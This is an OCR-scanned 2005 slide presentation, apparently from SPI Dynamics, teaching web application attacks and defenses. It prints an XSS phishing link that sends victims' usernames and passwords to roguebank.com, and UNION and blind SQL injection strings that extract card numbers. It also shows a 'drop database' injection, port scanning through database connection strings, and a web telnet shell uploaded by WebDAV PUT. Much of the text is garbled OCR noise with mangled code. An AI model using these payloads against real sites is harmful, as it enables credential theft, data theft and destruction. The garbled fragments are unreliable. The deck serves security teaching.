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Comparing web app sec to host / network security 

Cross-site-scripting 

XSS Proxy 

SQL Injection 

SQL Injection "spot" techniques 

Nasty SQL Injections 

Blind SQL Injection 

Testing ACLs with param manip 

Web Telnet: Something fun for WebDav Uploads 

Bad Extension source disclosures 

Managing web app sec 

Contributing factors to the problem 
Approach to web app sec programs 
Why the C&A process fails web app sec 
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Web Application Development "Truisms" 



Web applications are software 



Multi-billion dollar software companies inadvertently create a 
massive number of vulnerabilities in their software 



Your web developers have a lot less training and resources than 
software companies do. 



Development standards emphasize functionality, not security 



C-Levels understand other topics better - IDS / IPS, patches 



Web App dev not approached as engineering 
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Web Application Attacks 



Known Web Server Attacks 
i 



OS Att acks 

cm 



Network Attacks 








£3\ I Webserver 

!={ | Known Vulnerabilities - Misconfigurations 



/Si 










i 
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More manageable due to 
uniformity 






Global notification 




Standardized testing 
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Web App is A Different Paradigm 



Vulnerabilities are custom 

No global announcement 

No fix handed down 

Non-standard testing 

Overall more difficult management 



Bottom Line: It's YOUR problem 



Copyright 2005 SPI Dynamics 



DYNAMICS 



Web Application Vulnerability Characteristics 



Affects all Web applications: 

•Exists in your own application, not the operating system 

•Can exit regardless of the Web server, operating system, configuration, 
or patch level 






Sometimes requires nothing more than a Web browser 
Orders of magnitude easier than buffer overflows 



■ ■ ■ ^^ va ■ ^ ^ ^^ ^/a ^^ ^% ■ w w ■ ^ ■ ■ «^% ^ 



SSL Encrypted Traffic , Huge Volume 

Rules granular to each input on each page, change as app changes 
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Typical Security Model 



Hardened Builds 

- Patch Management 

- Configuration 
Management 



Network Scanning 

Firewalls 

IDS /IPS 

AV, ASPY, A-SPAM 
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Typical Web App Sec Practices 



This Page Intentionally Left Blank 
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Tuesday's BugTraq Summary Pt 1 
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FRONT AND CENTER 

1. Windows rootkits of 2005, part three 

2. Patching a broken Windows 
BUGTRAQ SUMMARY 

1. MTink Home Environment Variable Buffer Overflow Vulnerability 

2. MyBB Print Thread Script HTML Injection Vulnerability 

3. MyBB File Upload SQL Injection Vulnerability 

4. IBM AIX GetShell and GetCommand File Enumeration Vulnerability 

5. IBM AIX GetShell and GetCommand Partial File Disclosure Vulnerability 

6. InTouch User Variable SQL Injection Vulnerability 

7. PHPJournaler Readold Variable SQL Injection Vulnerability 

8. Chimera Web Portal Multiple Input Validation Vulnerabilities 

9. B-Net Multiple HTML Injection Vulnerabilities 

10. ScozNet ScozBook AdminName Variable SQL Injection Vulnerability 

11. VBulletin Event Title HTML Injection Vulnerability 

12. Drupal URL-Encoded Input HTML Injection Vulnerability 

13. File::ExtAttr Extended File Attribute Off-By-One Buffer Overflow Vulnerability 

14. DiscusWare Discus Error Message Cross-Site Scripting Vulnerability 

15. Gentoo Pinentry Local Privilege Escalation Vulnerability 
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Tuesday's BugTraq Summary Pt 2 
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16. INCOGEN Bugport Multiple SQL Injection Vulnerabilities 

17. SCO OpenServer Termsh Buffer Overflow Vulnerability 

18. INCOGEN Bugport Index. PHP Multiple Cross-Site Scripting Vulnerabilities 

19. EFileGo Multiple Input Validation Vulnerabilities 

20. Primo Place Primo Cart Multiple SQL Injection Vulnerabilities 

21. Valdersoft Shopping Cart Remote File Include Vulnerability 

22. Intel Graphics Accelerator Driver Remote Denial Of Service Vulnerability 

23. Linux Kernel SET_MEMPOLICY Local Denial of Service Vulnerability 

24. ESRI ArcPad APM File Processing Buffer Overflow Vulnerability 

25. IDV Directory Viewer Index.PHP Information Disclosure Vulnerability 

26. raSMP User-Agent HTML Injection Vulnerability 

27. Linux Kernel FIB_LOOKUP Denial of Service Vulnerability 

28. Lizard Cart CMS Multiple SQL Injection Vulnerabilities 

29. Linux Kernel Sysctl_String Local Buffer Overflow Vulnerability 
Linux Kernel DVB Driver Local Buffer Overflow Vulnerability 

31. KPdf and KWord Multiple Unspecified Buffer and Integer Overflow Vulnerabilities 

32. OpenBSD DEV/FD Arbitrary File Access Vulnerability 

33. PHP MySQL_Connect Remote Buffer Overflow Vulnerability 

34. Apple AirPort Remote Denial of Service Vulnerability 
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Tuesday's BugTraq Pt 3 



> 35. Blue Coat Systems WinProxy Remote Host Header Buffer Overflow 
Vulnerability 

> 36. Blue Coat Systems WinProxy Remote Denial Of Service Vulnerability 

> 37. Blue Coat Systems WinProxy Telnet Remote Denial Of Service 
Vulnerability 

> 38. HylaFAX Remote PAM Authentication Bypass Vulnerability 



> 
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52. 



Hylafax Multiple Scripts Remote Command Execution Vulnerability 

Apache mod_auth_pgsql Multiple Format String Vulnerabilities 

Foro Domus Multiple Input Validation Vulnerabilities 

OnePlug CMS Multiple SQL Injection Vulnerabilities 

iNETstore Online Search Cross-Site Scripting Vulnerability 

ADN Forum Multiple Input Validation Vulnerabilities 

IBM Lotus Domino and Notes Multiple Unspecified Vulnerabilities 

Timecan CMS ViewlD SQL Injection Vulnerability 

Modular Merchant Shopping Cart Cross-Site Scripting Vulnerability 

TheWebForum Multiple Input Validation Vulnerabilities 

Aquifer CMS Index.ASP Cross-Site Scripting Vulnerability 

TinyPHPForum Multiple Directory Traversal Vulnerabilities 

NetSarang XLPD Remote Denial of Service Vulnerability 

Navboard Multiple BBCode Tag Script Injection Vulnerabilities 
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Cross-Site-Scripting 



Download the Cross-Site-Scripting Whitepaper from http://www.SPIDynamics.com 



Cross-Site Scripting: Find the vulnerable field 



free Bank 

online 



• Customer Login 







Financial Planning 



Services 



Your Accounts 



Customer Support 



Invalid Login: Matt 
Username: 



Matt 



I 




Password: 



■ ; Minimum Graphics 
r Standard Graphics 



Access Accounts 



Invalid Login: Test 
Username: 



ntwrite ("Test")</script> 



Password: 




Minimum Graphics 1^ 
r Standard Graphics 



Access Accounts 



•Website accepts 
input from user 

•Replays their input 
without validating it. 

•Accepts J avaScript 
as input and replays 
it to the browser 



="258" HEIGHT= 



BGCOLOR="f2E7M3" ~1Y\J_ "IllH ill I" 1| 1 III 111 

ACT 1 0N= "1 g1nJ,,rfJ|J**METI HO D- " post ' ' > 

RMnvalid L^Tn: <5<zript>dacument. write ("Test")</script><br> 
me:<BR> 

type- "text 'NwiSEy login" 5TYLE="border: lpx solid black; spj£*rTg:0" 
rd:<BR> — ^_____^_^ 

TYPE="pas5word" NAME=" password" 5TYLE= Dorder: lpx solid black; spa 
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Enter Java script 



^j http://endo.webappsecurity.com/banklogin.asp7err =In valid Login: <script::= document. write("Test")< - Microsoft Internet Explorer 



.JnjxJ 



File Edit View Favorites Tools Help 



<5= Back ^ 



. (£ 



Search _jj Favorites £frMedia ffl 1^^ -g ^ [=] 



Address © http : //endo . webappsecurity . corn/b*fTnogin, asp?err=Invalid%20Login : %20 <script ^document . write("Test") </script > 



£>Hack 



Go gle- 



» 



Links 



Invalid Login: Test 
Username: 



nt. write ("Test")</script> 



Password: 





Minimum Graphics tj 
Standard Graphics 



Access Accounts 



Malicious script is entered in 
a form field, but is passed to 
next page as parameters in a 
URL 



URL with malicious script in 
parameter can now be 
distributed as a vector 
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Cross-Site-Scripting Attack Vector 



i±*tti FW: ft tuv« *iffii Fioti FwBwfeJ 



O-i-^iid! Hc!¥SdMtf 

From: Freefi** Special OIT^e [rrailKik^afl^icty^iTiica.cort] 

Sent: Monday. S=P»iW.1ti 16. Z0029:0SPM 

To: Fj^i^»i P. ClTr>5t^ 

SiJi|flCt: R«*M9 $300 FrGiraFreeR=i--*,! 



online °ANK 


CLICK HERE 


CONGRATULATIONS 

You have won S2M.00 from FREES ANK 

As an incentive to use online banking 
and Id show appreciation for our 
customers. we are giving S2D0 lo any 
customer who uses online banking this 
week! Simply click here and loqin lo 
receive yoUf FREE CASH! 


1 ' 


Dividend 







Cross-Site-Scripting attack 
via emailed vector. 

Innocent-looking Link has 
embedded JavaScript 



href ="htt p: //www. freebank. com/banklocjin. asp?serviceName=FreebankcaastAccess& ten 
ateName=prod_sel .fort e& spur rp^rrpphankAamp; an pp FERRiNG URL=httn://www. Freebar^ 
om& 

err=%3C/formK3E£3CformK2Qaction=S62 2loginl. asp%22%20method=^22post%22%20onsubmit=^ 
simage%2 0=%2 0new%2 0lmage;xssimage. src=' http://www. roguebank. com/'%2 0%2b%2 0document 
rms(l). login. value%2 0^2 b%2 0' : '%20%2b^20document .forms (1). password. value;^22%3E"> 



CLICI 



f ace="Aria 



[Oj^x/Bx/FONTXFONT COl or =#f f f f f f XBRXFONT 
LJ, J Oi l l _i jLPlf" Q1UL Dj -.D. I_U 



your</Bx/FONT><BxFONT face="Arial, Helvetica, sans-serif "xbrxfont 
size=4>$200. 00<BR>Dividend</FONTx/FONTx/Bx/FONTx/Dlvx/TD> 
<TD vAlign=top width=327 height =100 rowSpan=2> 
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Decoded Attack Sequence 



No Alarms and No Surprises 



r 



free Bank 

online 



• Customer Login 



Financial Planning 



Services 



Your Accounts 



Customer Support 



Register for an Interest 

Checking Account with 

FreeBank: 

First Name: 



Last Name: 



Register 




We are confident of our system's ability to protect all 
transactions; however, this is not an imitation for people to 
attempt TmantVioriTOrl art-ess to tVie system. This is a. private 
computing system which is restricted to authorised 
individuals. Actual or attempted unauthorised use of this 
computer system may result in criminal and/or civil 
prosecution. We reserve the right to view, monitor, and record 
activity on the system without notice or permission Any 
information obtained by monitoring, reviewing, or recording is 
subject to review by law enforcement organisations in 
connection with the investigation or prosecution of possible 
criminal activity on the system. If you are not an authorised 
user of this system or do not consent to continued monitoring, 
eiritthe system at this time. 




■Original legitimate website 

■No login errors, no 
changes, user works 
normally 

■User ID and Password 
quietly handed off to remote 
website 



</fa 



<form action="loginl.asp" methocH'post" onsubmit=" XSSimage = new 
Image ; XSSimage.src-http: //www .roguebank.com/ 1 + 
document, forms (1 V log in. value + ' :' +documentforms(l) .password.value;' l > M > 
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What Else 



Document.Cookie 
Window. Location 
Document.Write (your own html) 



Window.Open 
Window.Close 



Lets you steal the cookie from the site 

Lets you read the forms on the page that has the XSS 

Lets you create fake login forms etc. 
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Massive Advancements in XSS 



XSS Proxy by Anton Rager - revealed Shmoocon 2005 
http://sourceforqe.net/proiects/xss-proxy 

Opens an iFrame via an XSS 

- (ie, param=document.write ('<iframe src... 

DOM trusts this new frame - opened by parent site 

Frame source is xss-proxy running on attackers machine 

Chunks and codes current parent url / HTML into requests to attacker machine 
via this frame 

- Attacker sees what victim sees 

Receives commands via script from attacker machine 

- Attacker controls what victim sees does 



Makes XSS considerably more dangerous. 
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XSS Defenses 



Input AND output validation 



Always validate 
Always validate 
Always validate 



nput 
nput 
nput 



Validate/encode output: HTML Encoding helps break XSS 



More on Good / Bad Input Validation later 
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SQL Injection 



Download the SQL Injection Whitepaper from http://www.SPIDynamics.com 



Verbose and Blind 



Two types of SQL Injection 



Verbose: lack of error handling provides verbose feedback to 
the browser. Greatly enables the attacks 



Blind: Input still vulnerable to SQL Injection, but error handling is 
performed to prevent ODBC errors from displaying in the 
browser. Still vulnerable, requires more advanced and time 
consuming technique 
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SQL Injection 



OMozilla Href ox 



File Edit View Go Bookmarks Tools Help 



-|D| x| 



<?^~S 



T 



© Go JGl 




,_omdshe i O £) §J Q ffl ty ' 



http://127....server_info |Q] Google Search: xp_cnndshell 



Statistics 



Login 



Error: 

ACCESSIBLE_SPROC 

ACCESSIBLE_TABLES 

Bad Username or Incorrect 

Password 

COLLATION_SEQ 

COLUMN_LENGTH 

DBMS_NAME 

DBMS_VER 

DDL_IN_TRANSACTION 

DESCENDINGJNDEXES 

DROP COLUMN 



IDENTIFIER_CASE 

INCREASE_COLUMN_LENGTH 

MAX_INDEX_COLS 

MAX_OWNER_NAME_LENGTH 

MAX_OUAL_LENGTH 

MULTI_RESULT_SETS 

NAMED_TRANSACTIONS 

OWNER_TERM 

QUALIFIER_TERM 

REMOTE_SPROC 

RENAME COLUMN 







Massively Serious Issue 

Exploits common techniques developers 
use to query databases 

Allows attacker to indirectly access the 
database by piggybacking their queries 
onto the web developer's queries. 

Bottom Line : Turns any Web 
Surfer into your new 
Database Administrator ;) 



Done 
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Database Driven Page 



D http: in 27. 0. 0. 1 /stats/S ho wE rror. asp?E rrorCode=2 



© Go 



Login 



Error: 

Bad Username 



Please try again. 
Return to Login Page 



•Page reads ErrorCode from 
request 



•Uses ErrorCode in a SQL 
Query 



Writes the results of the query 
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Common Database Query 



Query written as 
text string 

sSql = "select Error Message from ErrorMessages where 
ErrorCode = " & Request("ErrorCode") 

Query parameter appended to query 



D http: //1 27. 0. 0. 1 /stats/S howE rror. asp?E rrorCode=2 




© Go 



select ErrorMessage from ErrorMessages where ErrorCode = 2 
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Problem: Unvalidated Input 




Microsoft OLE DB Provider for ODBC Drivers error '80040614' 

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string 

/stats/ShowError.asp, line 33 



Invalid character entered is used in query 



•Resulting back-end query results in an ODBC erorr message 

select ErrorMessage from ErrorMessages where ErrorCode = 2' 
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Piggybacking Queries with UNION 




Values entered into the parameter ErrorCode now have the ability to 
modify the query itself ( instead of just being a parameter to the query) 



select ErrorMessage from ErrorMessages where ErrorCode 
= 9 union select name from sysobjects where xtype- u' 



UNION keyword tells SQL to combine two 

statements into one I 
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Enumerate all tables in the database 




bankjogins 
DiiNYC 
DiiResults 
DirXP 



enoijnessages 
Invalid AccountName 



Sysobjects stores names 
of tables in database 

Name = name of table 

Xtype = type of table 
(system, user) 



Xtype- u' = all user 
tables, no system tables. 
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A SubQuery Enumerates Columns in the Table 



n%20select%20name%20from%20syscolumns%20wh 



Login 



Error: 

card 

card 




exp 
name 




caidjiumbei 
Invalid AccountName 



Columns are stored in 
syscolumns 

Keyed on ID 

Subquery against ID in 
sysobjects for the table you 
want 



Select name from syscolumns where id=(select id from sysobjects where 
name-table') 
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Select the data from the column 




Login 



Error: 

1254666633337890 
123467391 1114567 

5551444422226666 
76543211937654321 



Please try again. 
Return to Login Page 



4 HTTP packets to your data 

Find the injection 
Select tables from sysobjects 
Select columns from syscolumns 
Select data from column 



Can be reduced 

- Don't need to do an individual test 
test could be exploit 

- Reduce enumerations with more 
advanced queries 
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More Techniques 



Page Returns only One Record at a time 



Change code from: 



do until rs.eof 

response.write rs(0) & "<br>" 

rs. move next 

loop 



To just : response.write rs(0) 
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Incrementing the queries 



ErrorCode=2 union select cardjiumber from 
bank cards where 1=1 



1 is always equal to 1, returns first record 



Error: 

123-445-4222 



Please try again 



ErrorCode=2 union select 
cardjiumber from bank_cards where 
card number> , 123-445-4222" 



Simple Boolean operator returns new 
number, just rinse and repeat ... 



Error: 

201-442-5822 

Please try again 
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Dealing with Strings 



Change the code from this: 



sSql = "select message from Error_Messages where Code = " & 
request("ErrorCode") 



To this: 



sSql = "select message from Error_Messages where Code = '" & 
request("ErrorCode") & '"" 



Page now expects a string, everthing entered is inserted between 
single quotes 
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Escaping from Strings 



ErrorCode=2' union select card number from%20 bank cards where T- 1 



Query becomes: 



Error: 

123-445-4222 



Please try again. 



select message from Error_Messages where Code = 'ErrorCode=2' union 
select card number from%20 bank cards where T=T 
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Page Doesn't Print Response 



E rrorCode=con vert(inL(S elect+top+1 +name+f rom+sysobjects]) 




• Use CONVERT function 

• CONVERT is used to convert datatypes 

• When it fails, the error message shows you what fails 
Limitations: can only select one row at a time 
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Trapped in Middle of Query 



Change code to: 



Error_Messages where Code = " & request("ErrorCode") & " 
and message like '%error' " 



Injections are now trapped in middle of query with "unbreakable" 
where clause 
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Breaking Out of Queries 





=2%20uniori%20select%20card number%20from%20barik cards%20-- 



Comment characters at end of query truncated rest of string 
query. 

select message from Error_Messages where Code = 2 union 
select card_number from bank_cards --and message like 
'%error' " 
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More SQL Injection Goodness 



SELECT is just the first 1% 



DML : Data Manipulation Language 



Select, Insert, Update, Delete 



DBML: DataBASE Manipulation Language 



Add / Drop / Shrink / Grow DB's 

Stored procedures, extended stored 

procedures, functions 

Server management: users, network, disks 
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SQL Injection Annoyances 



Annoy the DBA 




Seriously **** OFF THE DBA !! 



Jl http: //1 27. 0. 0. 1 /stats/S howE rror. asp?E rrorCode=9;drop|%20database%20prod_db 
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Who is the App Logged In As? 




SA? 



Predictable, 

but BORING 



Let's try to be 
a bit more 
creative 




Login 



Error: 
sa 



Please try again. 
Return to Login Page 
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Adding your Own Database Account 




© Go 



g SQL Server 
B"3> (local) (Windows NT) 
f+l -Hi Databases 



Backup devices 
Logins 





[+]■! I Management 
■■■■■f^) Detached databases 



r Full data path in host computer for databases to attach 



Name 



Type 




N074H4x0r 



sa 



test 



UNKNOWNUSPNET 



Standard 



Standard 



Standard 



NTUser 



IBUJLnNSAdminMratQrs j NTGroup 



Not that we really needed a login anyhow 
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Port Scanning the Internal Network 



Port Scanning the Back End Network from the DB Server ? Priceless 



Just try to initiate a new database connection within the query 



,'uid=T hanks;p wd=ForT hePortS can;net work=D B M S S CN ;Address=y ahoo. com,80;timeout=3 Vselect: 




Microsoft OLE DB Provider for ODBC Drivers error S0040e14' 

[Microsoft][ODBC SQL Server Driver][SQL Server][DBNETLIB][ConnectionOpen 
(PreLoginHandshakeQ).]General network error. Check your network documentation 

/stats/ShowError.asp, line 39 



Something's wrong (because it isn't a database server ! ) but the port's open ; ) 
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Sanctified 



=T hanks;pwd=ForT hePortS can;network=D B M S S CN Address=y ahoo. com H 21 ;timeout=37s 



Microsoft OLE DB Provider for ODBC Drivers error 80040e14 



[Microsoft][ODBC SQL Server Driver][SQL Server][DBNETLIB][ConnectionOpen 
(ConnectQ).]SQL Server does not exist or access denied. 

/stats/ShowError.asp, line 39 



Port closed ... build script, rinse and repeat. 
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Your Back End Network 











HM*HU ™« 


-•■— - -i^QfcF- 




hh«*; »*i^-^w i q 






Statistics 














Lw 






Mntfi 
■mtam 




M- 






^vrttttng AeeoniM/ 




^ttlng Accom p//c 





9 




Not So Back End ;) 
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Who's Vulnerable 



Ridiculous number of sites 



Not aware 

Aware of vulnerability but not defenses 

Fully aware, no testing capabilities 



DoD ? Government ? Commercial ? 
Only small unimportant sites ? 



Copyright 2005 SPI Dynamics 



DYNAMICS 



Don't Suppress Errors Without Safe Queries 



The ODBC errors are the symptoms 

They help, but aren't required 

The problem is the way the query is formed in the web app 

Not fixing the query but suppressing errors is still hackable 
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Blind SQL Injection 



Blind Conditions 



Error Handling in Place : No ODBC error messages 

Does not necessarily print recordsets to screen 

Still using string concatenation queries : still vulnerable 



General Process: 

- Find a boolean situation you can use for deduction 

- Figure out how to ask Yes / No questions instead of open-ended 
questions 

- Ask lots and lots of Yes / No questions 
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Proper Error Handling In place 




ICheckProductlnventory 1 




Please try again. 
Return to Login Page 
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Does Not Print Records to Screen 



if rs(0) 




"" then response.write " in stock" 



Will not be able to use UNION attack 
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Test for Blind 



Pass a false statement 





Pass a true statement 



)?ProductType=2 and 1 =1 






in stock 

Check Another Product 
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Using Substring Command 



SUBSTRING command 

lets you specify a range of characters from a string 
accepts a query as the input 
specify start string and end string 



Substring("flsh" 1,1) returns T 
Substring ("flsh",l,2) returns 11' 
Substring ("fish", 2,3) returns "lsh" 
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Using Switch for Guessing 



Problem: Can't print results to screen 
Solution: Guess using booleans 
Is the letter greater than 'm' ? 



Problem: Can't grab everything at once. 
Solution: Grab one item at a time using TOP 1 
select top 1 name from sysobjects where xtype- u' 



Problem: Don't want to guess full name at a time 

Solution: Isolate each letter and guess those. 

Substring((select top 1 name from sysobjects where xtype- u'), 1,1) 
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20 Questions 



?ProductType=2 and substring ((select top 1 name from sysobjects where Ktype='u'),1 ,1 ) >'m' 



Combines two queries: hardcoded query and our injected query 



Asks a Yes / No question: Does the first letter of the first name 
in sysobjects come after the letter m ? 
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Bracket to Reduce Guessing 



Dividing in half to reduce to a single 

Faster work 

Less log / network traffic 



Not greater than 'm\ therefore between 'a' and 'm' 



id^20substring^20((select%20top^201^20name^20from^20sysobiects^20where^20xtijpe='u'],1,1)<'g' 



1 



in stock 

Check Another Product 



%20name%20from%20sysobjects%20where%20Htype='ul1 ,1 )>'c' 



J 



Check Another Product 



t 

_ 




in stock 

Check Anot 
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Repetez 



Substring(sfr//ig, character position, number of characters) 



Substring('tbl_credit_cards',l,l) = T 
Substring('tbl_credit_cards',2,l) = 'b' 
Substring('tbl_credit_cards',3,l) = 



Substring('tbl_credit_cards',4,l) = '_ 
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Input Validation 



Good Advice for Input Validation 



"as we know, there are known knowns; there are 
things we know we know. We also know there 
are known unknowns; that is to say we know 
there are some things we do not know. But there 
are also unknown unknowns -- the ones we don't 
know we don't know " 



- Donald Rumsfeld Tuesday, Feb. 12, 2002 



Source: http://www.defenselink.mil/transcripts/2002/t02122002_t212sdv2.html 
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Don't Blacklist 



You don't know what you don't know 

Stripping out bad words 

- Defense: remove "union" or "select" 

- Attack: ununionion seselectlect yadda yadda yadda 

Stripping out single quotes 

- Integers don't require quotes 

- Commmands - shutdown ? Drop ? 

Relying solely on stored procedures only 

- Attackable © if you still concatenate strings to call the procedure 

Relying on the platform alone 

- MagicQuotes ? 
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WhiteList 



Validate against the known good format 
- A zip code should always be [0-9] [0-9] [0-9] [0-9] [0-9] 

Trim lengths 



Use parameterized queries 

- All input to the query is treated as a parameter, no chance to modify the base 
query 

HTML encode output (for XSS) 
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Parameter Manipulation 



Parameter Manipulation 



Different from parameter injections 



Injections put new data types into the parameter 



Strict parameter manipulation just changes existing parameters 



Usually takes advantage of state mechanisms 
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Differences Illustrated 



Injection: Putting invalid data, also invalid TYPE of data 




Manipulation: Same type of data, just wrong values 
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Victoria's Secret 




flrder Uifmrmatimi 

thcnl Number 
Qidtr^unbtr 
Qidtf®Jk HW2W2 
Ship t.ito 1 1.ESii002 
Ship41*1hod UPS Ground 

QviCw ALLOtiStBt 



MF.iafcii7 

4F-10&S17 

4M50414 
4F-140142 



jilting ^rtOic-Sb 
VERNON KILLS, IL 



US 



Hi.3-h-.1ul M*J 
rtrhrtp^l fir* 

Hi'J h-Jyl t >V 
¥*hfc1t 

Hij-rntul bdl«d 
pc-iflMtiU rti fr*83) 

Liflhdjc !ir.*d Ml wvfu pc br 

?i*mliff plunja pufh-y-;- bu 
C-jm-ilrJ pihk (rf3) 

Sculpt* 4 dtmi &rj 



VICTORIA'S SECRET 





'ji-j^ii u ■..■■, 


M 


1 


*7M 


M 


1 


f7.00' 


M 


1 


*7.og 


S*fr 


1 


^OuA 


34D 


I 


K&M 


S4& 


1 


«*» 



■ IJ^ ' IIM^ 



von 

fJCOO 



Victoria's Secret, 
November 27, 2002 

Order ID parameter in the 
order status page 



Order status page bound 
to your session, but not 
the parameters 



$50,000 fine and publicity 
in 2003 



vie tori a secret, corn 
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Gateway Computers 



Gateway Computers 

• Website stored an ID number in a cookie to identify you when 
returning to the site. 

• By changing this ID number, you are able to view the information of 
other shoppers. 

• Information viewable includes Name, Address, Phone Number, 
Order History, Last Four Digits of Credit Card, Credit Card 
Expiration Date, Credit Card Verification Code. 



Wall Street Journal 

"More Scary Tales Involving Big Holes in 
Website Security", by Lee Gomes, February 2nd 
2004 
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Exploit Technique: Parameter Fuzzing 



Configuring the Fuzzer 



@ SPI Fuzzer 



File Edit Session Filters Help 
Sessions 




©Raw Edito 



URL |~ittp : //localhost : SO/secure/showpage . asp?pageid=8 

GET /secure/showpage.asp?pageid=8 HTTP/1.0 

Host: 127.0.0.1 

User- Agent: Mozilla/5.0 (Windows; U; winr 1 ^^;^^^^ 

Accept : text/xml, application/xml, applicatio 



Accept-Language: en-us J en;q=0.5 
Accept-Encoding: gzip, deflate 
Accept-Charset : 150-3359- 1 , utf -3; q=0 . 7, 
Keep-Alive: 300 




Browser View 



Number Generator Options 



Options 
Minimum 



"Generators 



Number Generator 



ASCII Generator 
Character Generator 
Decimal Number Generator 
Guid Generator 
WordList Reader Generator 
Generator 



2iJ 



Maximum 



Increment 











Loop Count 



aw Values 




Mode 





Incremental T | 



3\ 

Generator 
rator 



Ok 



Cancel 



I I HI I II I I 



"Description 

Basic number generator. Useful for testing 
various reactions to small or large 
numbers. 



Change 
Pageid=8 to 

Pageid=0 - 100 

And check 
results 



Configure 




Cancel 



=T 



Find 




Cancel 



J, 





Find 



Start 



Filter : Disabled 



J 
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Reviewing the Results 



@ SPI Fuzzer 



File Edit Session Filters Help 
Sessions 



-Inl x 



Fuzz Session / Redirection - 302 Object moved 
Fuzz Session / Client Error - 404 File Not Found 



Fuzz Session / Success - 200 OK 



Fuzz Session / Client Error 
Fuzz Session / Client Error 
Fuzz Session / Client Error 
Fuzz Session / Client Error 
Fuzz Session / Redirection 

^ 



404 File Not Found 
404 File Not Found 
404 File Not Found 
404 File Not Found 
302 Object moved 




Request 



GET /secure/showpage,asp?pageid=2 HTTP/1,0 

Host: localhost 

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:l,7,8) Gecko/20050 

Accept: text/xmljapplication/xmljapplication/xhtml+xmlj text/html; qMD.9; text/plain; q= 

Accept-Language: en-us J en;q=0.5 



Browser View 



Raw Response 




Logout Welcome to tlie Sensitive .Area of our 
Web Site whei e We Have Access Control and 
Authentication r 



[7] The Shmoo T^ 6 Shmoo Group is a non- 







Finished 



100% Sessions : 101 Filter : Disabled 




404's indicated no page behind 
that parameter 

302: page behind parameter 
properly redirected to login 



200: page behind parameter 
did not check access and 
allowed viewing 

Approximately half the pages 
had broken access controls 
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Misconfig allowing PUTs 



mproper VERBS: Exploiting PUT capabilities 



Exploiting WebDav PUTs 




Web based telnet client 
by Matt Fisher 



echo 



c:\temp\telnet.txt && type c:\temp\te In et.txt> Ente 



8/10/2005 1:29:14 PM 



c:\winnt\system3 2 > echo "this is telnet" > c:\temp\telnet.txt && 
type c:\temp\telnet.txt 

"this is telnet" 



Telnet 



Web based telnet client 
by Matt Fisher 



Enter 



S/1 0/2005 1:30:17 PM 



AI_LUSERSPROFILE=C:\Documents and Settmgs\AII Users 
ComrrionPrograrriFiles=C:\Program Files\Common Files 
COMPUTERNAME= 



^norr -WNN \Qvqtfi 



n^O\r 



fiYfi 



LIB=C:\Program Files\Microsoft Visual Studio .NET 2003\SDK\v1 .1\Lib 
NUMBER_OF_PROCESSORS=1 



windows NT 



PATHEXT= .COM; .EXE; EAT; .CMD; .VBS 
PROCESSOR_ARCHITECTURE=x86 
PROCESSOR_IDENTIFIER=x86 Family ' 
PROCESSOR LEVEL=15 



5; . VBE; . JS; . JSE; .WSF; .WSH; .tcl 



15 Model 2 Stepping 7, Oenuinelnte 



Only requires Windows Script Host on server 
WSH installed by default in everything since NT 4.0 
WSH rarely removed / disabled in production environments 
ASP usually relies on it (Scripting. FileSystemObject) 



ProqrainFiles=C:\Proqrain Files 
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Directory Browsing 



Index of Zinc 



H-mr* 



l.nrsr. ^ndifi^rj 



^ 
a 




Parent Dusctacy 



co'-incrv. inc 



© 

a 
a 
a 



O6-JaD-20O3 20: -J 7 



i J -Ml v- 2 00? 2"3:5B 



£D-A>ij-:oo? is:se 



gpu^r.ry. ilg. fuL L L J,a^ EQ-AWB^SQQS iS:3B 



■is- aeon . ar.c 



del - . ■cirOEll.-'KSj 2ILG 



e^eL-ua&ces - i bc 



20-liig-2aO2 19:29 



07-0ct-2Q02 



:C0 



03 -Be p-S 00? 10s37 



s. 



Directory browsing reveals 
file names - no chance at 
obscuring 

Reveals portions of site 
otherwise unknown 

Hacker would normally have 
to use file-guessing scripts 
and other clues 



Datacon.inc is easily 
guessed 
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Unmapped / Backup Files 



Application Configuration 



Mapping; 1 Op Nort*| Debugging 



|7 Cache IS API application 



-Application Mappings 




nfeble Kalh 



Verbs 



VW1 N D WS \S vste m32Mnet s r v\a % \ 
\WI r J D WS \S y^e rn32\inet s r v\a % p, 
\WI N D D WS \S yste m32\inet srv^asp. 
\WI N D WS \S y ste m32\inet s r v\a s p 
VWIN D WS\S ustem32\webh| 

WIN D WS\Sys(em32\inetsrvVhttp. 
Wl N D WS \S y ste m32Mdq =111 

\PHP\php.eKe 

\PerNbin^perl exe "Xs" Xs 

\Perl\bin^perlis.dll 

\WIN H l~l\ J^X 1. 1 i*t*mT?\irW*uA*-Hn 



GET.HEA. 

H\HEA 
GffT.HEA. 

T..HEA 
GET.HEA 
GELHEA. 
OPTIONS 
GET r HEA 

ML 

All 
GELHEA. 




Edit 



Remove 



OK 



Cancel 



Apply 



Help 



Only a few 
"known" file types 
get rendered. 



Everything else 
reveals their 
source code 



True for every 
web server, not 
just IIS 
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Source Code Disclosure 



fifed " © " B ® i 1 P*^ 1 ^l=«^b« ^KlHfca <p 


0* & ia * 


U * 


J^t\r.i t*r, j£~\ h J p :,' f .-.w j-.'.|p3ae-ift rsws.^nrvyrtns JealaeM . rv 


Links -,, TashilMi Peek ^g[] Q-rtMEt Links- ^| Pns ttObnal ^ RmIP lsy-=* -jj£] WrAws ^J Widows !-1e-^j 



-<? 



-"cirlEJU T-o ■caiinT.cc:^ ^q nnmh^x 



/ ■* ti e c? l9i e -a o ^ne relG vane va z Lalo leg 
£110=5^ ft^is^! = " lama Hh s^E^j 
^ij^^h: ii&H*e = " y i ■ in j 



■■.■ 






coai Motion to- 
cfl n jLsct i D_n in 



JuLuta^ *> 



rf i^li 



-ay 



yjajcie */ 



BlTiO 1 CCNHK" T | * host n^mc, ^3« ds« . 3 pusvm eL==e > OR B XE l 11 Un ob-le t u c g-iidi 



/ T Selecr Tlie- datbLaffi fianw t_a tie udtJ de Else prmL trccr 



isoige i± un_ 



■?3- 



5mcfl i Yue:r"F= if -ar Sic |V "'^QfL Etror Occurs ? S " ■wy^?q:l_eifTonr CJ n^i ' -\' . Sqy.tfT] ; " 
Snoqufryl=" or tile ( \ ,r 5QLi Zrror Oscuiea s S " i]fiiyac3l_e tr^r 1 1 p\ ' ; \ ■ . Scruervl] 

^BC«3UUE:rp2:= " CUT fllfi(\ ir 5QL Eltdr OCCUIBa I T" . Jiiysq l^G L7 £ DI || - > ' : \ ' -Sq^ierV-EI 

